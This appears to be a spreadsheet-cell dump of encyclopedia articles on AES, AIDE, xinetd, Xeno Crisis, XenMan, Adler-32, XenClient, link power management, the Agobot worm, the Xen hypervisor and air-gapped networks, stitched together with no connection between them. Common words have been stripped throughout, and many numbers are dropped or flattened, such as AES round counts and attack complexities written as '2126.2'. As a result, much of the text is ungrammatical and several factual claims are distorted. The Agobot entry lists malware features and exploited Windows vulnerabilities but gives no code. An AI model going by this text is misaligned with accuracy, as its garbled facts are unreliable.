multiplication composed multiplication addition entries. entries bytes treated coefficients polynomial order {\displaystyle x^{7}} addition simply xor. multiplication modulo irreducible polynomial {\displaystyle x^{8}+x^{4}+x^{3}+x+1} processed bit, then, shifting, conditional 1b16 performed shifted value larger ff16 (overflow must corrected subtraction generating polynomial). these special cases usual multiplication {\displaystyle \operatorname {gf} (2^{8})} general sense, column treated polynomial {\displaystyle \operatorname {gf} (2^{8})} multiplied modulo {\displaystyle {01}_{16}\cdot z^{4}+{01}_{16}} fixed polynomial {\displaystyle c(z)={03}_{16}\cdot z^{3}+{01}_{16}\cdot z^{2}+{01}_{16}\cdot z+{02}_{16}} coefficients displayed hexadecimal equivalent binary representation polynomials {\displaystyle \operatorname {gf} (2)[x]} mixcolumns step also viewed multiplication shown particular matrix finite field {\displaystyle \operatorname {gf} (2^{8})} this process described article rijndael mixcolumns. addroundkey addroundkey step, subkey combined state. round, subkey derived main using rijndael's schedule; subkey size state. subkey added combining byte state corresponding byte subkey using bitwise xor. optimization cipher systems 32-bit larger words, possible speed execution cipher combining subbytes shiftrows steps mixcolumns step transforming sequence table lookups. this requires four 256-entry 32-bit tables (together occupying 4096 bytes). round performed table lookup operations 32-bit exclusive-or operations, followed four 32-bit exclusive-or operations addroundkey step. alternatively, table lookup operation performed single 256-entry 32-bit table (occupying 1024 bytes) followed circular rotation operations. using byte-oriented approach, possible combine subbytes, shiftrows, mixcolumns steps single round operation. security national security agency (nsa) reviewed finalists, including rijndael, stated secure enough u.s. government non-classified data. june 2003, u.s. government announced could used protect classified information: design strength lengths algorithm (i.e., 128, 256) sufficient protect classified information secret level. secret information require either lengths. implementation products intended protect national security systems and/or information must reviewed certified prior acquisition use. rounds 128-bit keys, rounds 192-bit keys, rounds 256-bit keys. 2006, best known attacks rounds 128-bit keys, rounds 192-bit keys, rounds 256-bit keys. known attacks cryptographers, cryptographic "break" anything faster brute-force attack i.e., performing trial decryption possible sequence. break thus include results infeasible current technology. despite impractical, theoretical breaks sometimes provide insight vulnerability patterns. largest successful publicly known brute-force attack widely implemented block-cipher encryption algorithm 64-bit distributed.net 2006.the space increases factor additional length, every possible value equiprobable, translates doubling average brute-force search time. this implies effort brute-force search increases exponentially length. length imply security attacks, since ciphers long keys found vulnerable. fairly simple algebraic framework. 2002, theoretical attack, named "xsl attack", announced nicolas courtois josef pieprzyk, purporting show weakness algorithm, partially complexity nonlinear components. since then, papers shown attack, originally presented, unworkable; attack block ciphers. during selection process, developers competing algorithms wrote rijndael's algorithm concerned [its] security-critical applications." october 2000, however, selection process, bruce schneier, developer competing algorithm twofish, wrote thought successful academic attacks rijndael would developed someday, "did believe anyone ever discover attack allow someone read rijndael traffic."until 2009, successful published attacks full side-channel attacks specific implementations. 2009, related-key attack discovered exploits simplicity aes's schedule complexity 2119. december 2009 improved 299.5. this follow-up attack discovered earlier 2009 alex biryukov, dmitry khovratovich, ivica nikolić, complexity every keys. however, related-key attacks concern properly designed cryptographic protocol, properly designed protocol (i.e., implementational software) take care allow related keys, essentially constraining attacker's means selecting keys relatedness. another attack blogged bruce schneier july 2009, released preprint august 2009. this attack, alex biryukov, dunkelman, nathan keller, dmitry khovratovich, shamir, aes-256 uses related keys time recover complete 256-bit 9-round version, time 10-round version stronger type related subkey attack, time 11-round version. 256-bit uses rounds, attacks effective full aes. practicality attacks stronger related keys criticized, instance, paper chosen-key-relations-in-the-middle attacks aes-128 authored vincent rijmen 2010.in november 2009, first known-key distinguishing attack reduced 8-round version aes-128 released preprint. this known-key distinguishing attack improvement rebound, start-from-the-middle attack, aes-like permutations, view consecutive rounds permutation application so-called super-s-box. works 8-round version aes-128, time complexity 248, memory complexity 232. 128-bit uses rounds, attack effective full aes-128. first key-recovery attacks full andrey bogdanov, dmitry khovratovich, christian rechberger, published 2011. attack biclique attack faster brute force factor four. requires 2126.2 operations recover aes-128 key. aes-192 aes-256, 2190.2 2254.6 operations needed, respectively. this result improved 2126.0 aes-128, 2189.9 aes-192 2254.3 aes-256, current best results recovery attack aes. this small gain, 126-bit (instead 128-bits) would still take billions years brute force current foreseeable hardware. also, authors calculate best attack using technique 128-bit requires storing bits data. that works trillion terabytes data, data stored computers planet 2016. such, practical implications security. space complexity later improved bits, 9007 terabytes (while still keeping time complexity 2126.2). according snowden documents, research whether cryptographic attack based statistic help break aes.at present, known practical attack would allow someone without knowledge read data encrypted correctly implemented. side-channel attacks side-channel attacks attack cipher black box, thus related cipher security defined classical context, important practice. they attack implementations cipher hardware software systems inadvertently leak data. there several known attacks various implementations aes. april 2005, bernstein announced cache-timing attack used break custom server used openssl's encryption. attack required million chosen plaintexts. custom server designed give much timing information possible (the server reports back number machine cycles taken encryption operation). however, bernstein pointed out, "reducing precision server's timestamps, eliminating server's responses, stop attack: client simply uses round-trip timings based local clock, compensates increased noise averaging larger number samples".in october 2005, arne osvik, shamir eran tromer presented paper demonstrating several cache-timing attacks implementations found openssl linux's dm-crypt partition encryption function. attack able obtain entire operations triggering encryptions, total milliseconds. this attack requires attacker able programs system platform performing aes. december 2009 attack hardware implementations published used differential fault analysis allows recovery complexity 232.in november 2010 endre bangerter, david gullasch stephan krenn published paper described practical approach "near real time" recovery secret keys aes-128 without need either cipher text plaintext. approach also works aes-128 implementations compression tables, openssl. like earlier attacks, requires ability unprivileged code system performing encryption, achieved malware infection easily commandeering root account.in march 2016, ashokkumar ravi prakash giri bernard menezes presented side-channel attack implementations recover complete 128-bit blocks plaintext/ciphertext, substantial improvement previous works require million encryptions. proposed attack requires standard user privilege key-retrieval algorithms minute. many modern cpus built-in hardware instructions aes, protect timing-related side-channel attacks. nist/csec validation cryptographic module validation program (cmvp) operated jointly united states government's national institute standards technology (nist) computer security division communications security establishment (cse) government canada. cryptographic modules validated nist fips 140-2 required united states government encryption data classification sensitive unclassified (sbu) above. from nstissp #11, national policy governing acquisition information assurance: “encryption products protecting classified information certified nsa, encryption products intended protecting sensitive information certified accordance nist fips 140-2.”the government canada also recommends fips validated cryptographic modules unclassified applications departments. although nist publication (“fips 197”) unique document covers algorithm, vendors typically approach cmvp fips several algorithms (such triple sha1) validated time. therefore, rare find cryptographic modules uniquely fips validated nist generally take time list fips validated modules separately public site. instead, fips validation typically listed "fips approved: aes" notation (with specific fips certificate number) current list fips validated cryptographic modules. cryptographic algorithm validation program (cavp) allows independent validation correct implementation algorithm. successful validation results listed nist validations page. this testing pre-requisite fips 140-2 module validation. however, successful cavp validation implies cryptographic module implementing algorithm secure. cryptographic module lacking fips 140-2 validation specific approval deemed secure government cannot used protect government data.fips 140-2 validation challenging achieve technically fiscally. there standardized battery tests well element source code review must passed period weeks. cost perform tests approved laboratory significant (e.g., well $30,000 include time takes write, test, document prepare module validation. after validation, modules must re-submitted re-evaluated changed way. this vary simple paperwork updates security functionality change substantial re-testing security functionality impacted change. test vectors test vectors known ciphers given input key. nist distributes reference test vectors known answer test (kat) vectors. performance high speed requirements criteria selection process. chosen algorithm, performed well wide variety hardware, 8-bit smart cards high-performance computers. pentium pro, encryption requires clock cycles byte, equivalent throughput mib/s processor. intel core ryzen cpus supporting aes-ni instruction extensions, throughput multiple gib/s (even gib/s i7-12700k). implementations also modes operation disk encryption network encryption whirlpool hash function created vincent rijmen paulo barreto list free open-source software packages notes references external links "256bit 128bit block aes". cryptography ciphers: reference source code submissions international cryptographic designs contests. embeddedsw. "advanced encryption standard (aes)" (pdf). federal information processing standards. november 2001. doi:10.6028/nist.fips.197. 197. algorithm archive information (old, unmaintained) "part block ciphers" (pdf). information technology security techniques encryption algorithms (2nd ed.). iso. 2010-12-15. iso/iec 18033-3:2010(e). animation rijndael deeply explained animated using flash enrique zabala university montevideo uruguay). this animation english, spanish, german) also part cryptool (menu indiv. procedures visualization algorithms aes). html5 animation rijndael same animation made html5.</t>
  </si>
  <si>
    <t>Advanced Intrusion Detection Environment</t>
  </si>
  <si>
    <t>advanced intrusion detection environment (aide) initially developed free replacement tripwire licensed terms general public license (gpl). primary developers named rami lehti pablo virolainen, associated tampere university technology, along richard berg, independent dutch security consultant. project used many unix-like systems inexpensive baseline control rootkit detection system. functionality aide takes "snapshot" state system, register hashes, modification times, data regarding files defined administrator. this "snapshot" used build database saved stored external device safekeeping. when administrator wants integrity test, administrator places previously built database accessible place commands aide compare database real status system. should change happened computer snapshot creation test, aide detect report administrator. alternatively, aide configured schedule report changes daily using scheduling technologies cron, default behavior debian aide package.this mainly useful security purposes, given malicious change could happened inside system would reported aide. also host-based intrusion detection system comparison external links aide homepage aide github project aide online manpage aide reference ubuntu wiki opensuse security guide chapter aide references</t>
  </si>
  <si>
    <t>Xinetd</t>
  </si>
  <si>
    <t>computer networking, xinetd (extended internet service daemon) open-source super-server daemon runs many unix-like systems manages internet-based connectivity.it offers secure alternative older inetd ("the internet daemon"), modern linux distributions deprecated. description xinetd listens incoming requests network launches appropriate service request. requests made using port numbers identifiers xinetd usually launches another daemon handle request. used start services privileged non-privileged port numbers. xinetd features access control mechanisms wrapper acls, extensive logging capabilities, ability make services available based time. place limits number servers system start, deployable defense mechanisms protect port scanners, among things. implementations daemon starts maintains various internet-related services, including telnet. extended form inetd, offers enhanced security. replaced inetd v10.3, subsequently launchd replaced v10.4. however, apple retained inetd compatibility purposes. configuration configuration xinetd resides default configuration file /etc/xinetd.conf configuration services supports reside configuration files stored /etc/xinetd.d directory. configuration service usually includes switch control whether xinetd enable disable service. example configuration file time server: default: description: time server. this protocol provides site-independent, machine readable date time. time service sends back originating source time seconds since midnight january first 1900. this version. service time disable type internal time-stream socket_type stream protocol user root wait this version. service time disable type internal time-dgram socket_type dgram protocol user root wait lines character beginning comments without effect service. there service versions first based transmission control protocol (tcp), second based user datagram protocol (udp). type planned usage service determines necessary core protocol. simple way, handle huge data transmissions, lacks abilities rearrange packages specified order guarantee integrity, faster tcp. functions, slower. there column versions inside braces. first type option, second applied variable. disable option switch service not. cases default state yes. activate service change there three types services. type internal service provided xinetd, based remote procedure call, commonly listed /etc/rpc file, unlisted service neither /etc/services /etc/rpc files. unique identifier service. socket_type determines data transmission service. there three types: stream, dgram raw. this last useful, want establish service based non-standard protocol. with user option possible choose user owner running service. highly recommended choose non-root user security reasons. when wait xinetd receive request service connection. number connections limited one. provides good protection want establish connection time. there many options available xinetd. linux distributions full list possible options description accessible "man xinetd.conf" command. apply configuration sighup signal must sent xinetd process make re-read configuration files. this achieved following command: kill -sighup "pid". actual process identifier number xinetd, obtained command pgrep xinetd. references external links opensuse fork, contain patches several distributions: opensuse, debian, fedora, gentoo,</t>
  </si>
  <si>
    <t>Xeno Crisis</t>
  </si>
  <si>
    <t>xeno crisis 2019 homebrew twin-stick shooter developed indie game studio bitmap bureau sega mega drive, releases nintendo switch, playstation playstation vita, xbox one, microsoft windows, macos, linux, sega dreamcast, evercade, geo. game fully funded kickstarter january 2018, release october 2019. gameplay xeno crisis inspired similar arcade shooters like smash shock troopers, direction inspired alien movie franchise. featuring single cooperative gameplay, players play unnamed space marines work seven levels scientific facility featuring procedurally generated rooms levels, number enemies various difficulty room, concluding final boss battle levels. after player kills enemies screen, chance item, weapon drop, health, dogtags dropped player. dogtags used in-game currency help purchase upgrades like additional health player speed. increase challenge players, starting machine limited amount ammunition, weapon pickups limited number uses, requiring players stay move lookout ammunition boxes. plot game begins commander darius receiving distress signal outpost scientific research facility. controllable space marines sent drop ship facility, begin work level facility, face aliens, robot defenses, even cthulhu, figure going along space marines find survivors facility able rescue release safety. when space marines reach final stage, confronted herzog, reveals behind various horrors space marines battled point. either space marines drank "elixers" (the continue feature game), player used cheat codes, herzog reveals elixers designed contained nanomachines kill player characters game "bad" ending. player elixers confronting herzog, attack player game's final boss reveals creature like creatures battled point. when players defeat herzog, "good" ending revealed space marines evacuating facility. reception reception xeno crisis generally positive. nintendo life praised game's design gameplay, criticized difficulty off-putting inexperienced players. wireframe also praised game's polish gameplay, criticized design decisions like weapon upgrades melee attack feature. references external links bitmap bureau development blog</t>
  </si>
  <si>
    <t>XenMan</t>
  </si>
  <si>
    <t>xenman hypervisor management tool graphical user interface allows user perform standard operations (start, stop, pause, kill, shutdown, reboot, snapshot, etc...) addition higher level operations creation guest domain (which includes creation configuration file, retrieval appropriate kernels initial disks, well starting domain) single operation. goal create graphical management tool fulfills management needs novice advanced user require. application developed python programming language, uses widget released gpl. external links xenman sourceforge project page. xenman screenshot.</t>
  </si>
  <si>
    <t>Adler-32</t>
  </si>
  <si>
    <t>adler-32 checksum algorithm written mark adler 1995, modifying fletcher's checksum. compared cyclic redundancy check length, trades reliability speed (preferring latter). adler-32 reliable fletcher-16, slightly less reliable fletcher-32. history adler-32 checksum part widely used zlib compression library, developed mark adler. "rolling checksum" version adler-32 used rsync utility. calculation adler-32 checksum obtained calculating 16-bit checksums concatenating bits 32-bit integer. bytes stream plus one, individual values step. beginning adler-32 run, initialized sums done modulo 65521 (the largest prime number smaller 216). bytes stored network order (big endian), occupying significant bytes. function expressed (mod 65521) (mod 65521) n×d1 (n−1)×d2 (n−2)×d3 (mod 65521) adler-32(d) 65536 string bytes checksum calculated, length example adler-32 ascii string "wikipedia" would calculated follows: 0x398 (base 4582 0x11e6 output 0x11e6 0x398 0x11e60398 300286872 modulo operation effect example, since none values reached 65521. comparison fletcher checksum first difference algorithms adler-32 sums calculated modulo prime number, whereas fletcher sums calculated modulo 24−1, 28−1, 216−1 (depending number bits used), composite numbers. using prime number makes possible adler-32 catch differences certain combinations bytes fletcher unable detect. second difference, largest effect speed algorithm, adler sums computed 8-bit bytes rather 16-bit words, resulting twice number loop iterations. this results adler-32 checksum taking one-and-a-half times long fletcher's checksum 16-bit word aligned data. byte-aligned data, adler-32 faster properly implemented fletcher's checksum (e.g., found hierarchical data format). example implementation inefficient straightforward implementation zlib source code efficient implementation requires fetch additions byte, modulo operations deferred remainders computed every several thousand bytes, technique first discovered fletcher checksums 1988. js-adler32 provides similar optimization, addition trick delays computing "15" 65536 65521 modulos become faster: shown 65535)) 65521 equivalent naive accumulation. advantages disadvantages like standard crc-32, adler-32 checksum forged easily therefore unsafe protecting intentional modification. it's faster crc-32 many platforms. adler-32 weakness short messages hundred bytes, checksums messages poor coverage available bits. weakness adler-32 weak short messages wrap. maximum 128-byte message 32640, value 65521 used modulo operation, meaning roughly half output space unused, distribution within used part nonuniform. extended explanation found 3309, mandates crc32c instead adler-32 sctp, stream control transmission protocol. adler-32 also shown weak small incremental changes, also weak strings generated common prefix consecutive numbers (like auto-generated label names typical code generators). also list hash functions notes external links 1950 specification, contains example code zlib implements adler-32 checksum adler32.c chrome uses simd implementation adler-32 adler32_simd.c 3309 information short message weakness related change sctp</t>
  </si>
  <si>
    <t>XenClient</t>
  </si>
  <si>
    <t>xenclient desktop virtualization solution citrix runs secure virtual desktops endpoint devices. desktops locally, without hosting applications operating system datacenter. consists type-1 client hypervisor management server, provides features centralized provisioning, patching, updating, monitoring, policy controls, de-provisioning. enforces security features including aes-256 full disk encryption, isolation, remote kill, lockout, filtering, vlan tagging. xenclient supports cases disconnected operation laptops, limited connectivity environments (such branch offices), cases local execution desired centralized management required. history xenclient announced "project independence", joint project intel january 2009. xenclient released citrix september 2010 working partners intel, dell, microsoft. 2012, citrix acquired virtual computer, another provider client-hosted desktop virtualization solutions. today, citrix combined nxtop solution virtual computer hypervisor xenclient 4.5, released december 2012. overview xenclient available three different editions: xenclient enterprise, xenclient express, xenclient xt.xenclient enterprise desktop virtualization product composed client hypervisor, xenclient enterprise engine, management server, xenclient enterprise synchronizer. includes features image management, patching updating, backup recovery, security policy management, migration. designed enterprises available either standalone xendesktop enterprise platinum editions. xenclient express free edition xenclient enterprise provides access xenclient engine license xenclient synchronizer devices. designed professionals, consultants, small businesses. xenclient special, hardened version xenclient engine client hypervisor hardware-assisted features high level security. designed public sector industries extreme security requirements. xenclient enterprise works xenclient enterprise major components. first xenclient enterprise engine, includes client hypervisor virtual machines managed hypervisor. second xenclient enterprise synchronizer, management server manages multiple xenclient enterprise engines. xenclient enterprise engine xenclient enterprise engine type-1 client hypervisor runs bare metal directly hardware. uses open source hypervisor lets users multiple virtual machines simultaneously. since virtual machines executed locally, xenclient users work online offline, regardless network connection location. xenclient enterprise synchronizer users xenclient enterprise engine download images xenclient enterprise synchronizer locally laptops pcs. these images created synchronizer deployed (often golden image) users across organization. images backed restored, patched updated, security policies defined them. security policies include remote wipe/kill capabilities, aes-ni 256-bit full disk encryption, time-based lockout policies. moreover, images migrated different laptop case loss, corruption, disaster. synchronizer also remote office server capability support branch office remote users. remote office servers managed central synchronizer images downloaded central server remote servers wan. these images cached transmitted branch office remote users reduce utilization. backups also done locally improved performance disaster recovery. xenclient used organizations many different purposes. some major uses xenclient simplify management letting admins deploy manage single golden image many allow users work anywhere give central control offering desktop virtualization offline laptops protect corporate data enforcing security policies backing corporate user data reduce cost supporting remote branch offices remote office servers support windows migrations hardware-independent images propagated users manage shared kiosks, labs training facilities provisioning managing several time repurpose existing thin clients managing thin-client device customers many businesses different industries deployed xenclient, including companies industries healthcare, energy, retail. xenclient customers include: swisscom, afval energie bedrijf (aeb), advanced medical imaging, visma itc, residential finance corporation (rfc), eyecare medical group, intown veterinary group, town lincoln, massachusetts recognition xenclient recognized industry leader client virtualization. citrix placed leaders category latest “worldwide client virtualization 2012 vendor analysis” marketscape report. 2011, frank ohlhorst searchvirtualdesktop said xenclient ‘offers excellent performance improved stability’. 2012, andrew wood virtualization practice called xenclient revolution desktop virtualization laptops’. known limitations since xenclient type-1 client hypervisor, work every type operating system hardware. example, support operating system. however, latest version xenclient (xenclient 5.0) expanded hardware compatibility list (hcl) support newer laptops pcs, including ultrabooks generation intel core processors. addition, xenclient demonstrated past, meaning solution possible sometime future. references external links citrix xenclient site</t>
  </si>
  <si>
    <t>Aggressive Link Power Management</t>
  </si>
  <si>
    <t>aggressive link power management (alpm) power management protocol advanced host controller interface-compliant (ahci) serial (sata) devices, hard disk drives solid-state drives. description when enabled ahci controller, allows sata host adapter enter low-power state periods inactivity, thus saving energy. drawback increased periodic latency drive must re-activated brought back on-line used, often appear delay end-user. states there three states: active power internal states partial slumber. partial maximum return latency microseconds slumber maximum latency milliseconds. swapping disabled. device sleep maximum return latency milliseconds unless otherwise specified identify data logthese selected sata ahci driver, usually configuration option. swapping disabled. also energy star green computing active state power management (aspm) references external links aggressive link power management "designing energy efficient sata devices" (pdf). intel</t>
  </si>
  <si>
    <t>Agobot</t>
  </si>
  <si>
    <t>agobot, also frequently known gaobot, family computer worms. axel "ago" gembe, german programmer also known leaking half-life year release, responsible writing first version. agobot source code describes modular win32 linux”. agobot released version general public license. agobot multi-threaded mostly object oriented program written well small amount assembly. agobot example botnet requires little programming knowledge use. technical details versions, variants, worm appeared rapidly agobot family quickly grew larger families. other bots agobot family phatbot forbot. agobot several thousand variants. majority development force behind agobot targeting microsoft windows platform; result vast majority variants linux compatible. fact majority modern agobot strains must built visual studio reliance visual studio's processor pack. infectious agobot vary size ~12kbyte ~500kbyte depending features, compiler optimizations binary modifications. module written member agobot family usually ported ease another bot. this mix-matching modules suit owner's needs inspired many worm's variants. most agobots following features: password protected client control interface remotely update remove installed execute programs commands port scanner used find infect hosts ddos attacks used takedown networksthe agobot contain features packet sniffer keylogger polymorphic code rootkit installer information harvest email addresses software product keys passwords smtp client spam spreading copies http client click fraud ddos attacks spreading following propagation methods sub-modules port scanning engine: ms03-026 dcom remote buffer overflow ms04-011 lsass remote buffer overflow ms05-039 plug play remote buffer overflow attempts hijack common trojan horses accept incoming connections open port. ability spread systems brute forcing login. good example telnet microsoft's server message blockgenerally, observed every custom modified variant agobot features selection methods well "homebrew" modules, essentially released exploits ported code. names added files produce variable shuffle imports. variants gaobot.ee gaobot.ee variant agobot. also known w32.hllw.gaobot.ee. malicious computer worm tends come network ares, installing virus form, ares.exe. rather characteristics virus, unique ability download install random files (perhaps create sharers) members, music, pornography, even full games. gaobot.ee worm sends large numbers unsolicited e-mails using smtp engine. this worm also opens backdoor random port, notifies attackers predetermined channel, attempts terminate various security products system monitoring tools. security level low, hardly damage computer. however, reported download install spyware, viruses, trojans, worms, although officially proven. references external links w32.gaobot.dx symantec retrieved 20070618 w32.gaobot.cez symantec retrieved 20070618</t>
  </si>
  <si>
    <t>Xen</t>
  </si>
  <si>
    <t>(pronounced type-1 hypervisor, providing services allow multiple computer operating systems execute computer hardware concurrently. originally developed university cambridge computer laboratory developed linux foundation support intel, citrix, ltd, huawei, aws, alibaba cloud, amd, bitdefender epam. project community develops maintains project free open-source software, subject requirements general public license (gpl), version project currently available ia-32, x86-64 instruction sets. software architecture project runs privileged state software machine, except firmware. responsibilities hypervisor include memory management scheduling virtual machines ("domains"), launching privileged domain ("dom0") virtual machine default direct access hardware. from dom0 hypervisor managed unprivileged domains ("domu") launched.the dom0 domain typically version linux bsd. user domains either traditional operating systems, microsoft windows privileged instructions provided hardware virtualization instructions host processor supports virtualization, e.g., intel vt-x amd-v), paravirtualized operating systems whereby operating system aware running inside virtual machine, makes hypercalls directly, rather issuing privileged instructions. project boots bootloader grub, usually loads paravirtualized host operating system host domain (dom0). history originated research project university cambridge pratt, senior lecturer computer laboratory, student keir fraser. first public release made 2003, v1.0 following 2004. soon after, pratt fraser along cambridge alumni including simon crosby founding nick gault created xensource inc. turn competitive enterprise product. support embedded systems smartphone/ relatively scarce hardware computing resources, secure architecture exhibited summit april 2007, held watson. first public release secure source code made summit june 2008 sang-bum suh, cambridge alumnus, samsung electronics. october 2007, citrix systems completed acquisition xensource, project moved xen.org domain. this move started time previously, made public existence project advisory board (xen ab), members citrix, ibm, intel, hewlett-packard, novell, hat, microsystems oracle. advisory board advises project leader responsible trademark, citrix freely licensed vendors projects implement hypervisor. citrix also used brand proprietary products unrelated xen, including xenapp xendesktop. april 2013, announced project moved auspices linux foundation collaborative project. linux foundation launched trademark "xen project" differentiate project commercial older "xen" trademark. community website launched xenproject.org part transfer. project members time announcement included: amazon, amd, bromium, technologies, calxeda, cisco, citrix, google, intel, oracle, samsung, verizon. project self-governing.since version linux kernel, support dom0 domu exists mainline kernel. release history uses internet hosting service companies hypervisors provide virtual private servers. amazon (since august 2006), softlayer, liquid web, fujitsu global cloud platform, linode, orionvm rackspace cloud primary hypervisor product offerings.virtual machine monitors (also known hypervisors) also often operate mainframes large servers running ibm, systems. server virtualization provide benefits consolidation leading increased utilization rapid provisioning dynamic fault tolerance software failures (through rapid bootstrapping rebooting) hardware fault tolerance (through migration virtual machine different hardware) secure separations virtual operating systems support legacy software well instances computerxen's support virtual machine live migration host another allows load balancing avoidance downtime. virtualization also benefits working development (including development operating systems): running system guest avoids need reboot physical computer whenever occurs. sandboxed guest systems also help computer-security research, allowing study effects virus worm without possibility compromising host system. finally, hardware appliance vendors decide ship appliance running several guest systems, able execute various pieces software require different operating systems. types virtualization offers five approaches running guest operating system: (hardware virtual machine) drivers pvhvm (paravirtualization full hardware virtualization, i.e. pvhvm drivers) container) (paravirtualization).xen provides form virtualization known paravirtualization, guests modified operating system. guests modified special hypercall abi, instead certain architectural features. through paravirtualization, achieve high performance even host architecture (x86) reputation non-cooperation traditional virtualization techniques. paravirtualized guests ("pv guests" terminology) even cpus without explicit support virtualization. paravirtualization avoids need emulate full hardware firmware services, makes system simpler manage reduces attack surface exposed potentially malicious guests. 32-bit x86, host kernel code runs ring hosted domains ring (kernel) ring (applications). cpus support virtualization make possible unmodified guests, including proprietary operating systems (such microsoft windows). this known hardware-assisted virtualization, however, known hardware virtual machine (hvm). extensions provide additional execution modes, explicit distinction most-privileged modes used hypervisor access real hardware (called "root mode" x86) less-privileged modes used guest kernels applications "hardware" accesses complete control hypervisor x86, known "non-root mode"; root non-root mode rings 0–3). both intel contributed modifications exploit respective intel vt-x amd-v architecture extensions. virtualization extensions came 4.3. extensions also often offer instructions allow direct calls paravirtualized guest/driver hypervisor, typically used operations needing high performance. these allow guests suitable minor modifications gain many performance benefits paravirtualized i/o. current versions 4.2) fully virtualized guests make hardware facilities multiple independent levels memory protection paging. result, workloads, guests drivers (also known pv-on-hvm, pvh) provide better performance pure guests. device emulation based qemu project provide virtualization virtual machines. system emulates hardware patched qemu "device manager" (qemu-dm) daemon running backend dom0. this means virtualized machines emulated version fairly basic performance-critical environment, pv-on-hvm disk network drivers used normal guest operation, emulated hardware mostly used booting. features administrators "live migrate" virtual machines physical hosts across without loss availability. during procedure, iteratively copies memory virtual machine destination without stopping execution. process requires stoppage around 60–300 perform final synchronization virtual machine begins executing final destination, providing illusion seamless migration. similar technology serve suspend running virtual machines disk, "freezing" running state resumption later date. scale 4095 physical cpus, vcpus guest, vcpus guest, host, guest guest. availability hypervisor ported number processor families: intel: ia-32, ia-64 (before version 4.2), x86-64 powerpc: previously supported xenppc project, longer active arm: previously supported xenarm project older versions without virtualization extensions, cortex-a9. currently supported since newer versions virtualization extensions, cortex-a15. mips: xlp832 experimental port hosts shipped dedicated virtualization platform, xcp-ng citrix hypervisor (formerly citrix xenserver, xensource's xenenterprise). alternatively, distributed optional configuration many standard operating systems. available distributed with: alpine linux offers minimal dom0 system (busybox, uclibc) removable media, like sticks. arch linux provides necessary packages detailed setup instructions wiki. debian linux (since version "etch") many derivatives; freebsd includes experimental host support. gentoo necessary packages available support xen, along instructions wiki. mageia (since version netbsd function domu dom0. opensolaris-based distributions function dom0 domu nevada build onwards. opensuse 10.x 12.x: 64-bit hosts supported since 12.1; qubes uses isolate applications secure desktop. suse linux enterprise server (since version 10); solaris (since 2013 oracle server x86, xvm); ubuntu (since 12.04 "precise pangolin"; also 8.04 "hardy heron", dom0-capable kernel 8.10 "intrepid ibex" 12.04.) guests guest systems fully virtualized (which requires hardware support), paravirtualized (which requires modified guest operating system), fully virtualized paravirtualized drivers (pvhvm). most operating systems guest. following systems operate paravirtualized guests: linux freebsd 32-bit, 64-bit pvhvm; openbsd, pvhvm; netbsd minix hurd (gnumach-1-branch-xen-branch) plan bell labsxen version introduced capability microsoft windows guest operating system unmodified host machine's processor supports hardware virtualization provided intel vt-x (formerly codenamed vanderpool) amd-v (formerly codenamed pacifica). during development 1.x, microsoft research, along university cambridge operating system group, developed port windows made possible microsoft's academic licensing program. terms license allow publication port, although documentation experience appears original sosp paper. james harper open-source community started developing free software paravirtualization drivers windows. these provide front-end drivers block network devices allow much higher disk network performance windows systems running mode. without drivers disk network traffic processed qemu-dm. subsequently, citrix released license (and continues maintain) drivers windows. management third-party developers built number tools (known management consoles) facilitate common tasks administering host, configuring, starting, monitoring stopping guests. examples include: opennebula cloud management toolkit opensuse yast virt-man offer graphical management openstack natively supports hypervisor/compute target apache cloudstack also supports hypervisor novell's platespin orchestrate also manages virtual machines shipping suse linux enterprise server. orchestra xcp-ng citrix hypervisor platforms commercial versions xcp-ng (open source, within linux foundation project, originally fork xenserver) citrix hypervisor (formerly xenserver 2019) huawei fusionsphere oracle server thinsy corporation virtual iron (discontinued oracle) crucible (hypervisor) star corp.the hypervisor covered general public licence, versions contain core free software source code. however, many contain proprietary additions. also cloudstack kernel-based virtual machine (kvm) openstack virtual disk image tboot, txt-based integrity system linux kernel hypervisor vmware qubes references further reading paul venezia (april 2011) virtualization shoot-out: citrix, microsoft, hat, vmware. leading server virtualization contenders tackle infoworld's ultimate virtualization challenge, infoworld external links official website</t>
  </si>
  <si>
    <t>Air gap (networking)</t>
  </si>
  <si>
    <t>gap, wall, gapping disconnected network network security measure employed computers ensure secure computer network physically isolated unsecured networks, public internet unsecured local area network. means computer network network interface controllers connected networks, physical conceptual gap, analogous used plumbing maintain water quality. classified settings air-gapped computer network network interfaces, either wired wireless, connected outside networks. many computers, even plugged wired network, wireless network interface controller (wifi) connected nearby wireless networks access internet update software. this represents security vulnerability, air-gapped computers either wireless interface controller permanently disabled physically removed. move data outside world air-gapped system, necessary write data physical medium thumbdrive, physically move computers. physical access controlled (man identity storage media itself). easier control direct full network interface, attacked exterior insecure system and, malware infects secure system, used export secure data. that's hardware technologies also available like unidirectional data diodes bidirectional diodes (called also electronic airgap), physically separate network transportation layers copy filter application data. environments networks devices rated handle different levels classified information, disconnected devices networks referred side high side, unclassified high referring classified, classified higher level. this also occasionally referred (classified) black (unclassified). access policies often based bell–lapadula confidentiality model, data moved low-to-high minimal security measures, high-to-low requires much stringent procedures ensure protection data higher level classification. cases (for instance industrial critical systems), policy different: data moved high-to-low minimal security measures, low-to-high requires high level procedures ensure integrity industrial safety system. concept represents nearly maximum protection network another (save turning device off). transfer data outside world air-gapped system copy data removable storage medium removable disk flash drive physically carry storage system. this access still carefully controlled since drive vulnerabilities (see below). upside network generally regarded closed system terms information, signals, emissions security), unable accessed outside world. downside transferring information (from outside world) analyzed computers secure network extraordinarily labor-intensive, often involving human security analysis prospective programs data entered onto air-gapped networks possibly even human manual re-entry data following security analysis. that's another transfer data, used appropriate situations like critical industries, data diodes electronic airgaps, assure physical network specific hardware. sophisticated computer viruses cyberwarfare, stuxnet agent.btz designed infect air-gapped systems exploiting security holes related handling removable media. possibility using acoustic communication also demonstrated researchers. researchers also demonstrated feasibility data exfiltration using frequency signals. examples examples types networks systems gapped include: military/governmental computer networks/systems; financial computer systems, stock exchanges; industrial control systems, scada fields; national state lottery game machines random number generators, required completely isolated networks prevent lottery fraud life-critical systems, controls nuclear power plants; computers used aviation, fadecs, traffic control systems, avionics; computerized medical equipment; very simple systems, need compromise security first place, engine control unit devices automobile; digital thermostat temperature compressor regulation home hvac refrigeration systems; electronic sprinkler controls watering lawns.many systems since added features connect limited periods time organisation's internet (for need surveillance updates) public internet, longer effectively permanently gapped, including thermostats internet connections automobiles bluetooth, wi-fi cellular phone connectivity. limitations limitations imposed devices used environments include wireless connections secure network, similar restrictions leakage secure network tempest faraday cage. despite lack direct connection systems, air-gapped networks shown vulnerable attack various circumstances. scientists 2013 demonstrated viability malware 